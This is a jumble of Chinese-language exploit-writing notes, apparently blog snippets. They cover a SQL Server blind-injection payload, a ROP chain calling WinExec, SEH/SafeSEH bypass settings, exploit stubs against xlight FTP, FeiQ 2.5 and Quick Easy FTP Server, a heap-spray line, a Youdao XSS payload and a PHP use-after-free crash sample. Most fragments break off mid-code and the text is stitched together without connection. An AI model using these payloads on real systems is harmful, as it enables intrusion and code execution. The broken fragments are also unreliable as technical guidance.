遇到个sqlmap没吃下的，得自己上了。想到要自己上，蛋都碎了。

字符型的，盲注入。加入什么都BOOL运算在后面都返回302页面转向。只有有语法错误的时候返回500，不过没具体错误。目测SQL Server，具体版本不明。

这个。。。

'and(1/0=0)and(1=1)--   500 server error

'and(1/0=0)and(1=2)--   302 object move

这样就不同了，可是加入and(@@version/**/like/**/'%258.0.0%25')--这样的运算却不行了，这个有点诡异了

呃。

        帮朋友看个服务器，发现居然装了个老版本的xlight，找了好久才找到个中文版的，用ftpfuzz了下，发现个BUG做出了这个exp，只不过。。。没成功，被目标正确处理了，不知道是不是英文版和中文版的不一样。浪费时间啊，哎。

# -*- coding: cp936 -*-
import socket
import time
import sys
import struct
import string

def socket_connect(host, port):

select top 1 text from sys.dm_exec_sql_text((select top 1 sql_handle from sys.dm_exec_cursors(0)))where encrypted = 0;

ROP in ntdll.dll & kernel32.dll

   "\xbf\x8a\x95\x7c" //0x7c958abf :  # POP EDI # RETN    ** [ntdll.dll]
   "\x2e\x80\x95\x7c" //0x7c95802e :  # &RETN    ** [ntdll.dll]
   "\x2a\x21\x87\x7c" //0x7c87212a :  # POP ESI # RETN    ** [kernel32.dll]
   "\x16\x41\x86\x7c" //0x7c864116 :  # &WinExec

##### common base setting
filename = "POC.htm"

#####  SEH base setting
junk = "\x90" * 304
nseh = "\x90\x90\x90\x90"
seh = "\xd8\x9a\x83\x7c" #7C839AD8  kernel32._except_handler3 作为seh handle

#####  bypass safeSEH with kernel32._except_handler3

safe  = "\x5E\x16\x80\x7C" # kernel32.text.7c80165e  # RETN -->edi after sysenter

#include "stdio.h"
#include "windows.h"
#include "winsock.h"
#pragma comment(lib,"Ws2_32.lib")

int main(int argc, char* argv[])
{

 if(argc != 4)
 {
  printf("飞秋 2.5 远程栈溢出漏洞(SEH/DEP bypass)(TCP端口2425) Exploit\r\n\r\n");
  printf("\t\t\t\t\tconcat:");

http://sebug.net/vuldb/ssvid-19608

测试平台：windows 2k3 sp2 cn + mysql 5.0.45

遗憾啊，因为4个字节的指令没有找到适合的向回跳的方法，然而由于使用unicode.nls（找到的其他地址不合适，这里对输入的字符有要求，必须在0x80以下，不能是大写字母)来过Safe S.E.H，里面含有NULL ，所以SHELLCODE又无法布置在后面，希望有各位道友有空看看，弄个办法。

#define USE_OLD_FUNCTIONS
#include <winsock2.h>

windows xp sp3 cn

字符串：Notepad  77dda8dc  advapi32.text
函数system地址：

名称位于 msvcrt, 条目 773
 地址=77BF93C7
 区段=.text
 类型=输出    (已知)
 名称=system

00402451 >    68 DCA8DD77   PUSH 77DDA8DC             

failwest的书是很好的入门教程，也是我最早学习的书。这里我直接用了failwest前辈的shellcode，呵呵。

在看雪论坛古河同学的帖子里面下载回POC过后（http://bbs.pediy.com/showthread.php?t=145678，另外看雪上有分析文章的下载），发现POC对利用而言已经算很完美了，他BOF在了这里

Call dword ptr [ecx+4]

ecx呢就是poc.html中的

selob.w0 = unescape("%u0d0d%u0d0d%u0d0d%u0d0d%u0d0d%u0d0d");

第一个unicode表示的dword串。当然由于这

mona是一个为Immunity Debugger编写的插件，功能十分强大，可以帮助exploit编写人员快速找到想要的指令序列以及很多实用搜索内存的功能。其中有生成egg hunter代码的功能，默认生成结果如下

================================================================================
  Output generated by mona.py v1.1
  Corelan Team - http://www.corelan.be
================================================================================

环境为XP SP3 cn(x86) Office 2003

信息和原版POC来历：http://sebug.net/exploit/23168/

版本：Quick easy ftp server 4.0.0（其他版本未测试）

测试：W2K SP4

Quick easy ftp server 4.0.0 未安全使用wsprintfA函数进行字符串操作，导致格式化串漏洞。受影响的命令包括LS, CD，USER等。其中，USER命令不需要拥有合法的账户。

以下是简短的分析：

对于提交用户名：%x%x%x%x%n

读取参数时的栈布局如下：

0012FCC0   011652E8  ASCII "02/10/2011 22:33:20.2

地址：http://www.youdao.com/

功能：搜索

搜索关键字：\x27,x:alert(\x27hello\x27)}])//

漏洞成因：有道将用户搜索过的关键字保持在Cookie youdao_search_history_websearch中，采用^分割。在而后的使用中装入JSON字符串，由于没有过滤字符\导致对单引号的转义绕过过滤，在后来使用eval解析JSON字符串时执行恶意JS代码。

bug #54238 (use-after-free in substr_replace()). (CVE-2011-1148)

很惭愧，本人水平太有限，没有找到利用手法，呵呵。这里构造一个会Crash的样本以及分析过程，希望对读者有所帮助。

$ArrTest = Array();
$ArrTest[0] = "FUCKYOU,BABY!";
substr_replace($ArrTest, $ArrTest, $ArrTest);
分析：
011ED278  19 00 00 00 11 00 00 00 E8 EC 1E 01 48 EC 1E 01  ... ...桁 H?
011ED288  04 00 00 00 04 00 00 00 19 00 00 00 19 00 00 00  ... ... ... ...
011ED298